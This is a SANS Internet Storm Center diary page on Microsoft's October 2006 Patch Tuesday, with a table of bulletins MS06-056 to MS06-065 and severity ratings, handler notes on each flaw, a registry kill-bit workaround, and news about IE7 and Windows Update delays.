Threat Level: green Handler on Duty: Manuel Pelaez

SANS ISC InfoSec Handlers Diary Blog


Sign Up for Free!   Forgot Password?
Log In or Sign Up for Free!

Microsoft patch tuesday - October 2006 STATUS

Published: 2006-10-10
Last Updated: 2006-10-12 13:02:19 UTC
by John Bambenek (Version: 2)
0 comment(s)

Overview of the October 2006 Microsoft patches and their status.


IMPORTANT NOTE: There will be no more support for Windows XP Service Pack 1, after this month no patches will be released in support of that version.

Additional note: The reason for distinguishing between private and public disclosure is that potentially the "bad guys" have had more time to work on the vulnerabilities when the disclosure was public. In theory, and I realize that this is potential, private disclosure means the clock starts now for the "bad guys" to develop exploits. It has some impact on the severity of the problem in my opinion.

# Affected Known Problems Known Exploits Microsoft rating ISC rating(*)
clients servers
MS06-056 ASP.NET cross-site scripting

CVE-2006-3436
Information Disclosure

KB 922770
No known exploits, privately reported to MS
Moderate Less Urgent
Important
MS06-057 WebFolderView ActiveX (setSlice)

CVE-2006-3730
Remote code execution

KB 923191
Exploits available, publicly reported
Critical PATCH NOW
Important
MS06-058 4 remote code execution problems in PowerPoint

CVE-2006-3435
CVE-2006-3876
CVE-2006-3877
CVE-2006-4694
Replaces MS06-028

KB 924163
Actively being exploited, privately reported to MS
Critical Critical Less Urgent
MS06-059 4 remote code execution problems in Excel

CVE-2006-2387
CVE-2006-3431
CVE-2006-3867
CVE-2006-3875
Replaces MS06-037

KB 924164
Proof of concept available, no exploits yet, publicly disclosed
Important Important Less Urgent
MS06-060 4 remote code execution problems in Word

CVE-2006-3651
CVE-2006-3647
CVE-2006-4534
CVE-2006-4693
Replaces MS06-027

KB 924554
Proof of concept available, no exploits yet, publicly disclosed Important Important Less Urgent
MS06-061 Remote code execution in XSLT (MSXML)

CVE-2006-4685
CVE-2006-4686
Replaces MS02-008

KB 924191
No known exploits, privately reported to MS
Critical Critical Less Urgent
MS06-062 3 remote code execution problems in Office & Publisher

CVE-2006-3434
CVE-2006-3650
CVE-2006-3864
CVE-2006-3868
Replaces MS06-048

KB 922581
No known exploits, privately reported to MS
Important (new versions) / Critical (old versions)
Important Less Urgent
MS06-063 Buffer overflow / Denial of service in Server Service

CVE-2006-4696
CVE-2006-3942
Replaces MS06-035

KB 923414
Proof of concept available, no exploits yet, publicly disclosed
Important Important
Important
MS06-064 Denial of service attacks in IPv6

CVE-2004-0230
CVE-2004-0790
CVE-2005-0688
Denial of Service in IPv6

KB 922819
Proof of concept available, no exploits yet, publicly disclosed
Low Less Urgent **
Less Urgent **
MS06-065 Remote code execution in Object Packager

CVE-2006-4692
Remote code execution

KB 924496
No known exploits, privately reported to MS
Moderate Important Less Urgent

We will update issues on this page as they evolve.
We appreciate updates
US based customers can call Microsoft for free patch related support on 1-866-PCSAFETY

(*): ISC rating
  • We use 4 levels:
    • PATCH NOW: Typically used where we see immediate danger of exploitation. Typical environments will want to deploy these patches ASAP. Workarounds are typically not accepted by users or are not possible. This rating is often used when typical deployments make it vulnerable and exploits are being used or easy to obtain or make.
    • Critical: Anything that needs little to become "interesting" for the dark side. Best approach is to test and deploy ASAP. Workarounds can give more time to test.
    • Important: Things where more testing and other measures can help.
    • Less urgent: Typically we expect the impact if left unpatched to be not that big a deal in the short term. Do not forget them however.
  • The difference between the client and server rating is based on how you use the affected machine. We take into account the typical client and server deployment in the usage of the machine and the common measures people typically have in place already. Measures we presume are simple best practices for servers such as not using outlook, MSIE, word etc. to do traditional office or leaisure work.
  • The rating is not a risk analysis as such. It is a rating of importance of the vulnerability and the perceived or even predicted threat for affected systems. The rating does not account for the number of affected systems there are. It is for an affected system in a typical worst-caserole.
  • Only the organization itself is in a position to do a full risk analysis involving the presence (or lack of) affected systems, the actually implemented measures, the impact on their operation and the value of the assets involved.
  • All patches released by a vendor are important enough to have a close look if you use the affected systems. There is little incentive for vendors to publicize patches that do not have some form of risk to them.
(**): If you are running an IPv6 network, this probably is more important to you.

--
John Bambenek , bambenek/at/gmail/dot/com
with the help of: Johannes Ullrich, Joel Esler, Pedro Bueno, Kyle Haugsness

0 comment(s)

MS06-057: Vulnerability in Windows Shell Could Allow Remote Code Execution (926043)

Published: 2006-10-10
Last Updated: 2006-10-11 14:19:06 UTC
by Joel Esler (Version: 1)
0 comment(s)
https://www.microsoft.com/technet/security/bulletin/ms06-057.mspx
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4690
http://isc.sans.org/diary.php?storyid=1749

Affected Software:
- Microsoft Windows 2000 Service Pack 4
- Microsoft Windows XP Service Pack 1 and 2
- Microsoft Windows XP Professional x64 Edition
- Microsoft Windows Server 2003 and WS 2003 Service Pack 1 (Mitigated)
- Microsoft Windows Server 2003 and WS 2003 w/ SP1 for Itanium-based Systems (Mitigated)
- Microsoft Windows Server 2003 x64 Edition (Mitigated)
 
Impact:  Remote Code Execution
Severity:  Critical

(This replaces 06-045 for XP SP 1)

Description:  This is a remote code execution for Internet Explorer, that is caused by improper validation of the WebViewFolderIcon ActiveX object.  

Why do you have "Mitigated" in Yellow up above?

By default, Internet Explorer on Windows Server 2003 runs in a restricted mode that is known as Enhanced Security Configuration. This mode mitigates this vulnerability.

Workarounds

To set the kill bits for CLSIDs with values of {e5df9d10-3b52-11d1-83e8-00a0c90dc849} and {844F4806-E8A8-11d2-9652-00C04FC30871}, paste the following text in a text editor such as Notepad. Then, save the file by using the .reg file name extension.

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{e5df9d10-3b52-11d1-83e8-00a0c90dc849}]
"Compatibility Flags"=dword:00000400

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{844F4806-E8A8-11d2-9652-00C04FC30871}]
"Compatibility Flags"=dword:00000400

You can apply this .reg file to individual systems by double-clicking it. You can also apply it across domains by using Group Policy.
Keywords:
0 comment(s)

IE7 to hit the streets -- Reloaded

Published: 2006-10-10
Last Updated: 2006-10-10 23:49:45 UTC
by Joel Esler (Version: 10)
0 comment(s)
I have pulled the article in it's original form because of feedback.

Thanks to one of our readers that wrote in to tell us that IE7,  will be released this month via Automatic Update according to Microsoft's "IEBlog".  Take a risk assessment of your organization to decide if you should globally deploy the browser, taking into account the pros and the cons of the software.

If you can take this moment to try and move your organization to a different browsing platform for normal daily browsing, that may be something you want to look into.  We've said it before, and we'll say it again, diversity is good. 

Reader Dan writes in to tell us:
"You may also want to note that Firefox even has a plug-in available to open certain links in IE. This makes it even easier to follow your advice of only using IE when you absolutely must." -- https://addons.mozilla.org/firefox/35/

Reader "Vision Jinx" writes in to tell us:
"I notice that IE View just opens the page in IE as a POP up type feature. IE Tabs (https://addons.mozilla.org/firefox/1419/) actually will load a FF Tab that uses IE therefore no need for all them extra Windows, as it just uses a tab in Firefox."

Joel Esler
Keywords:
0 comment(s)

Delays on Windows Update & the Death of SUS

Published: 2006-10-10
Last Updated: 2006-10-10 19:59:48 UTC
by John Bambenek (Version: 1)
0 comment(s)
Windows Update is currently experiencing delays and not serving up all those happy patches. The MSRC is reporting some delays with getting the patches up.  If you need them immediately you can download directly from the bulletins. ISC Reader Jim McCormick found that by clearing out C:\WINDOWS\SoftwareDistribution\DataStore and C:\WINDOWS\SoftwareDistribution\Download he was able to take care of business. Choice is yours.  You could also always wait. :)

Alan Mercer sent in a reminder that Microsoft is discontinuing support for SUS on Dec. 6th, 2006. Because this is before the December patch cycle, it seems that November will be the last patch cycle that SUS will be supported. With the holidays coming up, it's time to think about upgrading to WSUS.
Keywords:
0 comment(s)

MS Office vulnerabilities (-058, -059, -060, -062)

Published: 2006-10-10
Last Updated: 2006-10-10 19:37:30 UTC
by Kyle Haugsness (Version: 2)
0 comment(s)
There are four advisories for Microsoft Office this month.  All of them appear to be standard client-side vulnerabilities.  So the exploitation model is someone evil sends a document (of the affected type) with an exploit buried inside and if the exploit works, the attacker gets the privileges of the user opening the document.  These types of bugs have been very popular lately.

MS06-058: Four vulnerabilities in PowerPoint.  One of these vulnerabilities have been exploited in the wild (PowerPoint Malformed Record).

MS06-059: Four vulnerabilities in Excel.  Two of these have had proof of concept exploit code posted publicly already; the other two vulnerabilities were privately reported to Microsoft.

MS06-060: Four vulnerabilities in Word.  Two of these have been publicly disclosed already; the other two vulnerabilities were privately reported to Microsoft.

MS06-062: Three vulnerabilities in Office and Publisher that were reported privately.  Exploit code and details have not been released yet.

Keywords:
0 comment(s)

MS06-064: Vulnerabilities in IPv6

Published: 2006-10-10
Last Updated: 2006-10-10 19:21:49 UTC
by John Bambenek (Version: 1)
0 comment(s)
According the advisory this one will fix a couple of
vulnerabilities. The vulnerabilities have the CVE numbers of CAN-2004-0790,
CAN-2004-0791 , CAN-2004-0230 and CAN-2005-0688.

The best way to understand the fixes is to think of them as an IPv6 version of
the same patch that fixed these same vulnerabilities last year with
MS05-019 (http://www.microsoft.com/technet/security/Bulletin/MS05-019.mspx)

Another thing is that it is a DoS condition remote attack, which could
make your system reboot or stop to repond, so I would recommed you to
follow the same procedures (test, test, test, deploy).
Keywords:
0 comment(s)

MS06-063: Server service (Mailslot DoS and SMB Rename)

Published: 2006-10-10
Last Updated: 2006-10-10 19:21:10 UTC
by Kyle Haugsness (Version: 2)
0 comment(s)
There are two vulnerabilities in this advisory.  The first is a simple Denial of Service against all Windows platforms.  The attack vector is TCP ports 139 or 445.  Apparently, there is an unitialized buffer that could be modified remotely to crash the box.  Exploit code has been available for this bug since July 19, 2006.  Famed handler Swa covered it in a diary entry last month: http://isc.sans.org/diary.php?storyid=1599

It looks like the Core Security folks found this after the MS06-035 in July (http://www1.corest.com/common/showdoc.php?idx=562.  Microsoft also has a blog entry on it: http://blogs.technet.com/msrc/archive/2006/07/28/443837.aspx .

There probably isn't any need to freak out on this particular vulnerability.  The exploit has been out in the wild for several months.  If you are seeing some mysterious reboots on Windows machines and untrusted people can hit TCP 139 or 445 on those hosts, then this could potentially solve your problems (although Microsoft is claiming that it hasn't been used in the wild yet).  Otherwise, there are no code execution possibilities with this vulnerability, so you don't need to be in "emergency mode" to patch it.

The second vulnerability (SMB Rename) is a remote code execution bug against the Server service, but it requires authentication.  So this isn't readily wormable (except maybe in a corporate environment if a user with admin privileges was owned).  This one is a little higher priority than the DoS above.
Keywords: MSFT1006
0 comment(s)

MS06-065: Remote Code Excution in Windows Object Packager

Published: 2006-10-10
Last Updated: 2006-10-10 18:59:47 UTC
by John Bambenek (Version: 1)
0 comment(s)
There exists a remote code execution vulnerability in Windows Object Packager (MS06-065) due to the way the application handles file extensions. A specially crafted file could be created that would execute code if a user was sent to a malicious website. However, there is quite a bit of user interaction required for this exploit to actually work. Enhanced Security Configuration for Windows 2003 will effectively mitigate this problem.

The CVE for this exploit is CVE-2006-4692 and will not likely see much action in the wild.
Keywords:
0 comment(s)

MS06-061: XSLT/MSXML Buffer Overflow Code Execution Vulnerability (moderate)

Published: 2006-10-10
Last Updated: 2006-10-10 18:40:14 UTC
by Johannes Ullrich (Version: 1)
0 comment(s)
This vulnerability sounds like a classic parser buffer overflow. The advisory actually includes information regarding two distinct vulnerabilities. But only one of them allows arbitrary code execution.

As with similar vulnerablities, the user has to expose the browser to malicious XML code. This could happen by visiting a compromissed site. Once the browser is exposed to the exploit, it will inherit all the privileges of the user running the browser.

Mitigation steps: SandboxIE, do not  run as administrator and similar steps will help limit the impact of the vulnerability. This vulnerability is first of all a client issue, less a server issue. You could also try the "Internet Explorer Enhanced Security Configuration". However, I find it a bit too strict most of the time (e.g. no Javascript).


Keywords: MSFT1006
0 comment(s)

MS06-056: ASP.NET XSS Information Disclosure Vulnerability (moderate)

Published: 2006-10-10
Last Updated: 2006-10-10 18:39:10 UTC
by Johannes Ullrich (Version: 1)
0 comment(s)
A XSS vulnerabiity in ASP.NET could allow information disclosure. The bulletin is a bit vague on the details, but it does mention a problem with headers. Typically, cookie information could be disclosed using XSS attacks. In turn, the cookie information can be used to impersonate an authenticated user.

The script inserted with XSS will inherit all the capabilities the particular user has. For example, a user could be tricked into clicking a link that will escalate privileges for a malicious user. Exploitation typially requires intimate knowledge of the respective web based application.

XSS exploits are typically not browser specific. Any browser is "vulnerable" given that the actual problem is the web based application. Turning off javascript may help, but then again, you will hit this issue typically as you visit a trusted web site (for example you own web site written in ASP.NET).

You will probably consider this problem more severe ("critical") if you use ASP.NET extensively to manage internal applications. However, on the same note first test the page using your specific web based applications.

Other mitigation steps: Disable ASP.NET if not used on your web server.

This patch is not important for workstations and only applies to servers running web sites with ASP.NET support turned on.

Keywords: MSFT1006
0 comment(s)
Diary Archives